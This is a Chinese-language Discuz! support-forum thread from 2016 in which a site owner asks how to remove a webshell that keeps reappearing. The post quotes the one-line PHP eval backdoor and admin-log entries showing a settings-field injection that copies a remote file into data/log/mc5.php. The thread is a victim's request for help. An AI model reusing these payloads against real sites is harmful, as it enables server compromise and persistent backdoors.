Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[求助] 论坛被植入后门删掉又出现 该怎么办?

[复制链接]
longago 发表于 2016-7-16 17:10:42 | 显示全部楼层 |阅读模式
月初的时候收到阿里云的短信通知说论坛的目录中发现有两个webshell的的木马,在discuz论坛的 data/log 目录中,其中一个叫mc5.php文件内的代码为 \"%><?php eval($_POST[ob]);?><%'  我上百度查了下是可以执行任何php程式的木马,另一个php文件代码很多,好像是用来脱库的,于是我立刻删掉了这两个文件。

然后我在discuz后台发现有人盗用了管理员的密码!并在后台执行了以下两行代码(在后台的管理记录中查看到的),两行代码执行的位置都在后台的域名设置中,视乎是利用后台的域名设置选项中的漏洞上传的这个后门! 我当时立刻修改了管理员密码,想说是不是堵住了漏洞!

  1. GET={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; }; POST={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; };
复制代码

  1. GET={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; }; POST={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; };
复制代码

但是今天我又收到阿里云的检查到同样的webshell木马,就是那个mc5.php,我上服务器删掉文件,但是立即又生成一个,我去查看discuz的后台管理记录,发现并没有其他人登陆过后台,现在不知道黑客是利用的什么来上传的文件?是不是因为之前管理员密码被盗执行的那两行代码没有得到修复? 论坛现在已经打了最新的0601补丁!不过还是删掉后会不停生成后门文件

eForcy 发表于 2016-7-16 17:33:14 | 显示全部楼层
检查下服务器安全,先把系统、ftp、数据库密码全改一遍。。。
回复

使用道具 举报

mz1519 发表于 2016-7-16 18:17:15 | 显示全部楼层
联系我   QQ 712923250
回复

使用道具 举报

 楼主| longago 发表于 2016-7-16 21:11:33 | 显示全部楼层
已经解决了!虽然不太懂,自己慢慢摸索根据黑客植入的语句在数据库中找到了相关字段并清除掉了!
回复

使用道具 举报

crx349 发表于 2016-7-16 21:44:12 | 显示全部楼层
做好服务器安全哦
回复

使用道具 举报

crx349 发表于 2016-7-16 21:44:37 | 显示全部楼层
做好服务器安全哦
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-12-22 23:23 , Processed in 0.025931 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表